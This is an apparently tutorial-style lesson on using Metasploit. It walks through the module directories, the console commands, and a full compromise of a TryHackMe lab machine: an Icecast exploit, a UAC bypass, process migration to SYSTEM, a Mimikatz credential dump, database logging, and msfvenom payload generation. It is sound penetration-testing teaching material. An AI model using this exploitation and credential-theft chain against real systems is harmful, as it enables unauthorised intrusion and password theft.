Metasploit describes itself as a “penetration testing framework.” This means that for anything pentesting-related, Metasploit has a tool. We can use it to gather info, gain access, conduct all types of attacks, and even cover our tracks.
It has over 2000 exploits for different services and operating systems. It also has 1000+ modules we can use for information gathering, scanning, and enumeration. This is a MUST-HAVE tool for network pentesting.
This lesson will cover:
- Understanding Metasploit’s core services and commands
- Using Metasploit to hack into a Windows machine, discover exploits, and execute them
- Saving your work on Metasploit to a database
- A brief overview of Msfvenom, a payload generator that comes with Metasploit
This lesson uses a Kali Linux OS. Metasploit is installed by default, but if you don’t have it, execute these commands:
sudo apt update
sudo apt install metasploit-framework
Run this command to start Metasploit:
msfconsole
First, let’s understand Metasploit’s directory structure.
We’ll cover the core directories: Documentation, Data, Lib, Modules, Plugins, Scripts, and Tools.
DOCUMENTATION
This stores documentation about all the services Metasploit offers.
You’ll spend a lot of time reading these. I suggest exploring one:
DATA
This directory holds files used for exploits, binaries needed for specific exploits, images, evasion tools, wordlists, post exploits, shellcode, and more.
LIB
All the ruby library scripts used by Metasploit’s modules are here.
MODULES
This directory contains all the modules for auxiliary, encoders, evasion, exploits, nops, payloads, and post exploits.
PLUGINS
As you can see below, the directory holds ruby scripts for a variety of plugins.
SCRIPTS
This directory contains ruby scripts for Meterpreter and other tools.
TOOLS
Lastly, the tools directory holds various ruby scripts for even more tools.
Now that we’ve covered the key directories, let me show you commands that will help you interact with this wide-ranging tool.
As you work through this guide, understand that learning Metasploit is like learning Python. It’s a skill, and you won’t reach mastery in one day.
COMMANDS THAT WILL HELP YOU INTERACT WITH METASPLOIT
“help” or “?”
“?” simply takes you to the help menu. From there, we can see information about all the Metasploit commands and their use.
You can string the options “help <command_name>” together to show information about a specific command. Like this:
show
This command displays information for things like exploits, payloads, encoders, auxiliary, and more.
info
This command is like “help,” but for what’s in the modules directory- where exploits, encoders, payloads, etc, reside.
It will show information like the payload type, privilege level needed, and other information we need before executing it. The syntax is ‘info <path_of_module>’.
Before I show you the info command in action, let me explain Payload Types in Metasploit.
Payloads Type
Metasploit has 3 primary types of payloads: singles, stagers, and stages.
Each has a unique role:
Singles
- This is a self-contained exploit for a specific task. There are no additional files that need to be downloaded. This type of payload contains everything in one, so it’s more stable.
Stagers
- Stagers establish a network connection between the target system and Metasploit. Once the connection is made, the attack machine sends additional payloads (called stages) to the target.
Stages
- Stages are payload components. Once a stager payload has connected to the target system, it downloads additional payloads onto the target- these are called “stages.”
Look at the image below. We can see what type of payload it is, and the variables required by the payload. I’ll show you how to set those variables in a moment.
use
Let’s say decide to use an exploit. You’ll run this command:
use <exploit_path>
You can then type “info” into the terminal, and you’ll see more information. Like this:
options
After running the “use” command, the “options” command will let you know what variables are required by the exploit.
set
Once you know what’s required, use the set command to define the variables.
RHOSTS was empty earlier, but now it has the value we assigned it.
unset
This unsets the variable. Like so:
exploit
Once the variables are set, you can exploit the machine. In this example, I’m using this TryHackMe machine.
First, open a terminal and run this command:
sudo openvpn Downloads/<your_vpn_config_file>
In Metasploit, run this command:
use exploit /windows/http/icecast_header
I’ll show you later how I discovered that the machine is vulnerable to this exploit. For now, just follow along.
Now run the options command to figure out what you need:
Set the RHOSTS and LHOST.
Then use the “exploit” command. A Meterpreter shell initiates. Enter the command “sysinfo”.
Voila! Now that we’re inside the Meterpreter shell, don’t forget to run help and familiarize yourself with it.
run
You’ve successfully penetrated a machine. Now, let’s run a script to get additional information. Use this command:
run post/muti/recon/local_exploit_suggester
Looks like we have a few vulnerabilities!
background
This command backgrounds our current session.
Run this command:
background
Let’s use the exploit at this location: exploit/windows/local/bypassuac_eventvwr
We need a session value, the LHOST, and the LPORT.
First, let’s deal with sessions. Execute this command to see the available sessions:
sessions -l
We have one session. We’ll use that.
Let’s set LHOST (localhost) to tun0.
If you look back to our previous exploit, we already have an active connection on port 4444.
This exploit will fail if we use that port. I’ll go with 1337 for LPORT.
Let’s fill the options.
The exploit was successful. We also have a new Meterpreter session.
Run the getprivs command. This shows us our privileges. Because of the exploit, we have expanded privileges that can be used maliciously.
We’re still not a “system” user yet. To get this, we need to migrate our process into a process with the NT AUTHORITY/SYSTEM privilege. That’s the highest privileged user in a Windows OS.
Run the ps command to see the processes currently running:
Let’s migrate the process our exploit is running on to a different process. I’ll go with spoolsv.exe (near the bottom, PID 1276.)
Run this command:
Perfect. Time to find out even more information!
Use this command to load Mimikatz:
load kiwi
I suggest looking at the Mimikatz hyperlink, since it’s an excellent post-exploitation tool. We can steal passwords and more with it!
Run the help command to see which command you might use:
Let’s go with creds_all.
exit
This command will help you exit a Meterpreter shell. Go ahead and run it.
sessions -k
Now let’s kill the session.
back
This takes us back to the previous stage (before we started the exploit.)
Great work so far! I think you have the basics now. Let’s go further.
search
In my opinion, this is the most important command in Metasploit. Your success depends on first finding the right exploit, payload, auxiliary, etc.
For example: imagine you have access to a machine, and you want to find passwords on it. You need a post exploit. Here’s how you can use search to find that:
search type:post password
You’ll see a list of all the password-related exploits Metasploit has to offer.
Finding exploits with CVE numbers.
Use this command to search by CVE year.
search cve:2022
Use this command to find exploits by their exact CVE number.
search cve:<year>-<number>
This command finds exploits based on the OS and date.
search type:exploit platform:<platform_of_concern> date:<year>
Let’s try removing the platform and viewing everything.
search type:exploit platform:-linux date:2022
MSFDB (Metasploit Framework Database): one of Metasploit’s most time-saving tools
A lot of Metasploit tools require a database. Plus, importing information to the database- like Nmap scan results- can help you efficiently gather and consolidate information. This is tremendously helpful to have when writing reports.
Setup
Msfdb uses PostgreSQL. You need to start that first. Use this command in a terminal:
systemctl start postgresql
Now start Metasploit.
Within Metasploit, run the command below. It initializes the msfdb.
sudo msfdb init
There’s the username, the database, and configuration file path. Run the command ‘db status’ to check the status of the database.
Connect the database using the config file.
Now let’s combine msfdb and Nmap. I’ll use this vulnerable machine from TryHackMe (if you have been following along from the beginning, it is the same room we used earlier- it’s named Ice.)
First, scan the machine.
You might be thinking “If I can do this with Nmap, why do this inside Metasploit?” Great question. Just stay with me, and you’ll find out.
Let the scan finish and run the command “services”. You will be able to see open ports, the associated protocols, their names, and information about them.
You can use the -c flag to filter these results, too.
As you can see, it’s running Icecast on port 8000. Let’s see if there’s an exploit associated with it.
There is! Earlier in the lesson, I mentioned that I would show how I determined that the machine was vulnerable in this way. This is how I discovered that.
Now let’s use it and determine our requirements.
Set the RHOSTS (change this to your vulnerable machine’s IP) and LHOST (set to tun0)
Now run the exploit.
Let’s background this for now.
Run the command ‘vulns.’ You’ll see that msfdb has stored this vulnerability.
Head back to the Meterpreter session.
sessions -i <session_id>
Now run this command:
run post/multi/recon/local_exploit_suggester
It show us more exploits. Let’s go with the one titled “/windows/bypassuac_eventvwr” (option 7.)
Use it. View the options and fill in the SESSION and LHOST variables. Set SESSION to 1 and LHOST to tun0. Then run the exploit.
When it’s complete, migrate the process like we did earlier.
Load Mimikatz again. Let’s dump the passwords with the creds_all command.
Background the session. Let’s see if we can find a way to crack any of these hashes.
Let’s go with module 6. View the options- we only need a session. Set it to the one we just backgrounded.
Now run the command “creds”. You’ll see that everything is stored for you.
Let’s export it to the database with this command:
db_export -f xml msfoutput.xml
This is infinitely more efficient than manually documenting everything. As you work, Metasploit can store everything on the database for you.
Last section: Msfvenom
Msfvenom is a payload generator. You can use it to generate custom payloads for all types of targets. Let’s see some examples:
Start with the help command. We’ll go over the core options:
– l <type>
This lists all the modules you can use.
If you string options together, you can find payloads for certain platforms.
msfvenom -l payloads --platform “<platform_name>”
-p <path_of_payload) —list-options
Look at the command in the screenshot below. The -p selects a specific payload, and —list-options shows more info about it.
To save a payload as an .aspx file, you can run this command:
msfvenom -p <payload_path> <set_requirement> -f aspx -o shell.aspx
The -p option selects the payload. When I viewed the options for this payload, LHOST and LPORT were required. That’s why I set them.
-f formats it to aspx, and -o (output) saves the file as shell.aspx.
How about running the payload as a Python script? Look below:
The -v option is used to choose the variable name.
-b means “bad characters.” It prevents the payload from using those characters, since the inclusion of certain characters can ruin buffer overflow-type exploits.
That’s all for now. Thanks for hanging in there! This was a LOT. Again, Metasploit is like Python- it’s a skill, and you’ll improve the more you practice. I recommend you play around with it and get your hands dirty.